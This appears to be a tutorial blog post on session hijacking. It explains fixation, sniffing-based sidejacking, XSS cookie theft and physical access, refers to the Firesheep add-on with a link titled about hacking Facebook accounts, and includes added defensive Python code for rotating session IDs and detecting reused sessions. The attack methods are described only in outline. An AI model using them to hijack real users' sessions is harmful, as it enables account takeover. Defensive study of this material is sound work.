TCP session hijacking is when a hacker takes over an established TCP session between
two machines. Since most authentication occurs only at the start of a
session, whoever takes the session over after that point inherits the
authenticated access, which is what lets the hacker gain access to the machine.
Different session hijacking methods:
Session stealing is achieved by the following methods.
1. Session fixation:
In this method, the hacker sets the victim's session ID to a value the
hacker already knows. For example, the hacker sends the victim an email with a link
that contains a particular session ID. If the victim follows that
link and logs in, that known session becomes authenticated, and the hacker can use it to gain access.
2. Session sidejacking (session sniffing):
In this method, the attacker uses packet sniffing to steal the
session cookie. To prevent this, some websites use
SSL for the login (encrypting it) but do not use encryption for the rest of
the site once the user is authenticated, so the session cookie is sent in the
clear on every later request. This allows an attacker who can read the
network traffic to intercept all the data submitted to the
server and every web page viewed by the client.
Unsecured hotspots are especially vulnerable to this type of session hijacking.
3. Client-side attacks (XSS, malicious JavaScript code, trojans, etc.):
The hacker can steal the session by running malicious JavaScript
code on the client's system. Usually hackers attack a website using XSS
and insert their own malicious JavaScript code into it.
From the client's point of view it is still a trusted website, so the victim visits it.
When the victim visits the link, the malicious JavaScript executes and
steals the session cookies and other confidential data.
4. Physical access:
If the hacker has physical access to the machine, it is easy for him to steal
the session. Usually this happens in a public cafe: one user logs in to
some websites (Facebook, Gmail) on the shared computer, and a hacker who uses
that computer after the victim can steal the session cookies that are still stored there.
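The three cookie-level defences implied by the methods above can be shown in a few lines of server-side code. The following is an added example, not code from the original post: a constructed, stdlib-only Python session store (the names SessionStore, SESSION_COOKIE and simulate_fixation_attempt are assumptions). It never promotes a session ID the client brought along (fixation), issues a fresh ID at login, and sends the cookie with Secure and HttpOnly so it is neither transmitted in the clear on an open hotspot (sidejacking) nor readable by injected script (XSS).

```python
import secrets

# Added example (not from the original post). Constructed, stdlib-only session
# store; names such as SessionStore and SESSION_COOKIE are assumptions.
SESSION_COOKIE = "session"


class SessionStore:
    """In-memory session table: session id -> session data."""

    def __init__(self):
        self._sessions = {}

    def _new_id(self):
        # 256 bits from the OS CSPRNG: an attacker cannot guess or pre-choose it.
        return secrets.token_urlsafe(32)

    def resolve(self, presented_id):
        """Look up the session id sent by the client.

        Only ids this server issued are honoured. An id that arrived in a link
        or was planted by someone else is ignored and a fresh anonymous session
        is started, which is the first line of defence against fixation.
        """
        if presented_id is not None and presented_id in self._sessions:
            return presented_id
        sid = self._new_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_id, user):
        """Authenticate and rotate the session id.

        Even if the presented id was legitimately issued by us, whatever existed
        before authentication is discarded and the logged-in state is bound to
        a brand-new id that nobody else has seen.
        """
        self._sessions.pop(presented_id, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": user}
        return sid

    def user_for(self, sid):
        s = self._sessions.get(sid)
        return None if s is None else s["user"]


def set_cookie_header(sid):
    # Secure: only sent over TLS, so a sniffer on open Wi-Fi never sees it
    # (the whole site must be served over TLS for this to hold, not just login).
    # HttpOnly: not exposed to document.cookie, so injected script cannot read it.
    # SameSite=Lax: not attached to most cross-site requests.
    return f"{SESSION_COOKIE}={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def simulate_fixation_attempt(store, attacker_chosen_id="attacker-picked-id"):
    """Walk through the fixation scenario and report what each party ends up with."""
    # Victim arrives via the attacker's link carrying the attacker-chosen id.
    anon_sid = store.resolve(attacker_chosen_id)
    # Victim authenticates; the server issues a fresh id for the logged-in session.
    logged_in_sid = store.login(anon_sid, "victim")
    return {
        "attacker_id_accepted": anon_sid == attacker_chosen_id,
        "attacker_id_is_logged_in": store.user_for(attacker_chosen_id) == "victim",
        "login_rotated_id": logged_in_sid != anon_sid,
        "victim_logged_in": store.user_for(logged_in_sid) == "victim",
    }


if __name__ == "__main__":
    store = SessionStore()
    print(simulate_fixation_attempt(store))
    print(set_cookie_header(store.resolve(None)))
```

The rotation in login() matters even when the presented ID was genuinely issued by the server: a pre-login ID that leaked in any way (a link, a sniffed request, a shared computer) stops being useful the moment the victim authenticates.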
Session hijacking using Firesheep (Mozilla Firefox addon):
Firesheep is a famous Mozilla Firefox addon that made session hijacking very easy.
Using Firesheep, you can steal the sessions of public Wi-Fi users
and gain access to the victim's accounts on Facebook,
Twitter and some other websites. Read more about Firesheep:
How to Hack Facebook Account using FireSheep
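A sniffed or physically copied cookie is replayed from the attacker's own machine, so one signal a site can watch for is a session ID turning up from a client that does not match the one that established it. The following is an added example, not code from the original post or from Firesheep: the access-log format, the sample lines and the function name find_session_reuse are constructed assumptions. It parses the log, records the first (IP, User-Agent) pair seen for each session and reports every later request from a different pair.

```python
import re
from collections import defaultdict

# Added example, not from the original post. The access-log format below is a
# constructed assumption, not any real server's default format.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) sid=(?P<sid>\S+) ip=(?P<ip>\S+) ua="(?P<ua>[^"]*)" path=(?P<path>\S+)$'
)

# Constructed sample: session s1 is established from one client and then
# replayed from a second client (the sidejacking pattern); session s2 is only
# ever used by the client that created it.
SAMPLE_LOG = """\
2012-07-30T10:00:01Z sid=s1 ip=192.0.2.10 ua="Firefox/14" path=/login
2012-07-30T10:00:05Z sid=s1 ip=192.0.2.10 ua="Firefox/14" path=/inbox
2012-07-30T10:00:09Z sid=s2 ip=192.0.2.23 ua="Chrome/20" path=/login
2012-07-30T10:00:40Z sid=s1 ip=192.0.2.77 ua="Firefox/3.6" path=/inbox
2012-07-30T10:00:41Z sid=s1 ip=192.0.2.77 ua="Firefox/3.6" path=/settings
2012-07-30T10:01:00Z sid=s2 ip=192.0.2.23 ua="Chrome/20" path=/inbox
this line is not in the expected format and is skipped
"""


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_session_reuse(text):
    """Return one alert per (session, new client fingerprint) pair.

    The fingerprint is (ip, user-agent). The first fingerprint seen for a
    session is treated as its owner; any later request from a different
    fingerprint is reported once. A legitimate user changing networks will
    also trigger this, so treat it as a cue to re-authenticate or invalidate
    the session, not as proof of compromise.
    """
    owners = {}                   # sid -> (ip, ua) that first used it
    reported = defaultdict(set)   # sid -> fingerprints already alerted on
    alerts = []
    for rec in parse_log(text):
        fp = (rec["ip"], rec["ua"])
        sid = rec["sid"]
        if sid not in owners:
            owners[sid] = fp
            continue
        if fp != owners[sid] and fp not in reported[sid]:
            reported[sid].add(fp)
            alerts.append({
                "sid": sid,
                "owner": owners[sid],
                "new_client": fp,
                "first_seen_at": rec["ts"],
                "path": rec["path"],
            })
    return alerts


if __name__ == "__main__":
    for a in find_session_reuse(SAMPLE_LOG):
        print(f"session {a['sid']} owned by {a['owner']} also used from "
              f"{a['new_client']} at {a['first_seen_at']} ({a['path']})")
```

Binding a session to a client fingerprint is a detection aid rather than a cure: the real fix for sniffing is serving the whole site over TLS with Secure cookies, so that there is no plaintext cookie to capture in the first place.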